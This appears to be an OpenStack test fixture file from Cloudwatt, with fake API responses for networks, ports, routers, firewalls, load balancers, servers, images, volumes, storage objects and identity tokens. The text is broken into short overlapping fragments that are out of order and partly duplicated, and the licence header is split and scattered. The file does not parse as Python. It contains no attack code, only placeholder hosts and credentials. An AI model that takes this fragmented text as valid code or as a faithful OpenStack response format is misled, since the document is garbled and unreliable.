"\"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None, \"stack_status\":",
"\"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ]",
"\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS",
"\"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\":",
"[\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ]",
"{ u'id': u'v2.0', u'links': [ {u'href': u'%s' % AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/',",
"'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"\"shared\": False }, { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\":",
"\"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {},",
"PROJECT_ID, \"description\": \"Meter label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST",
"= [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" },",
"\"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1]",
"u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ { \"count\": 0, \"bytes\":",
"+ [ { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\":",
"\"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = { \"router\":",
"\"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"]",
"False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ],",
"'type': 'volume' }, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region':",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\",",
"'endpoints_links': [], 'name': 'Identity Service', 'type': 'identity' }, { 'endpoints': [{ 'adminURL': 'http://admin:8080',",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service', 'type': 'ec2' }, { 'endpoints': [{",
"'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"under the Apache License, Version 2.0 (the \"License\"); you may # not use",
"WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See",
"[\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from the Server PROJECT_SCOPED_TOKEN = { 'access':",
"\"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\":",
"'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service', 'type':",
"{ \"description\": \"Second test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ],",
"{ \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\",",
"u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types': [ {u'base':",
"= [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS =",
"'description': '', 'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject' } }, 'user': { 'id':",
"\"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\"",
"'name': 'Object Storage Service', 'type': 'object-store' }, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL':",
"{ \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST",
"= [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\",",
"], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS =",
"= [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"]",
"\"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\":",
"\"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False },",
"\"combination_rule\": None, \"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\",",
"SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS =",
"\"description\": \"\" } ] } METERING_LABEL_LIST = { \"metering_labels\": [ { \"tenant_id\": PROJECT_ID,",
"port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, {",
"] } FLOATING_IPS_LIST = { \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\":",
"= [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"]",
"True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False",
"\"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST =",
"{ \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\":",
"\"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = { \"stacks\": [ { \"description\": \"First test\", \"links\":",
"= [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\",",
"\"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\":",
"u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab',",
"an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either",
"Service', 'type': 'compute' }, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud',",
"{u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] }",
"LBAAS_POOL_LIST = { \"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\":",
"\"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\":",
"{ \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None,",
"\"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [ {",
"VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'}",
"= { \"ports\": [ { \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\",",
"'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service', 'type': 'ec2' }, { 'endpoints':",
"{ \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\"",
"\"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\",",
"} ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS = { \"ports\":",
"} ROUTER0_PORTS = { \"ports\": [ { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True,",
"\"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\":",
"\"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False }, { \"protocol\": \"tcp\", \"description\":",
"'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service',",
"\"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None, \"stack_status\": \"DELETE_FAILED\", \"id\": \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\" }",
"= { \"security_groups\": [ { \"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\",",
"IMAGES_LIST = { \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\":",
"\"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\",",
"policy 2\" } ] } FIREWALL_RULE_LIST = { \"firewall_rules\": [ { \"protocol\": \"tcp\",",
"\"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0,",
"at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed",
"LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\",",
"['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container':",
"\"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\":",
"LBAAS_MEMBER_LIST = { \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\":",
"u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href':",
"\"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\",",
"ROUTERS_IDS[0] } } ROUTER0_PORTS = { \"ports\": [ { \"status\": \"ACTIVE\", \"name\": \"\",",
"[], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\",",
"'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service', 'type':",
"{ \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] }, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\",",
"Copyright © 2014 Cloudwatt # # Licensed under the Apache License, Version 2.0",
"\"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\",",
"\"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] }",
"\"custom\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\":",
"\"firewalls\": [ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0],",
"u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml',",
"\"action\": \"allow\", \"ip_version\": 4, \"shared\": False }, { \"protocol\": \"tcp\", \"description\": \"Firewall rule",
"u'version': { u'id': u'v2.0', u'links': [ {u'href': u'%s' % AUTH_URL, u'rel': u'self'}, {u'href':",
"12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\":",
"ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\":",
"rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\":",
"[FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy",
"}, { \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\":",
"under the License. TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL",
"'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292'",
"\"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\":",
"}, { \"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [",
"{u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id':",
"\"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\":",
"VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\"",
"[{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute",
"'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service', 'type':",
"u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS",
"\"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\",",
"\"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT",
"{ \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\":",
"{ \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\",",
"\"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\":",
"\"session_persistence\": None } ] } LBAAS_POOL_LIST = { \"pools\": [ { \"status\": \"ACTIVE\",",
"\"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\",",
"= [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"]",
"SERVERS_LIST = { \"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": { \"private\":",
"False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0,",
"\"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\":",
"\"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\":",
"'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service',",
"{ \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0]",
"\"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly",
"{ \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\":",
"{ \"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": { \"private\": [ {",
"\"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\":",
"\"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = { \"volumes\": [",
"[ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\":",
"PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None,",
"\"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None,",
"= 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT =",
"\"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\":",
"\"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" }",
"None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, {",
"{ \"description\": \"First test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ],",
"}, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\":",
"{ \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\":",
"} SERVERS_LIST = { \"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": {",
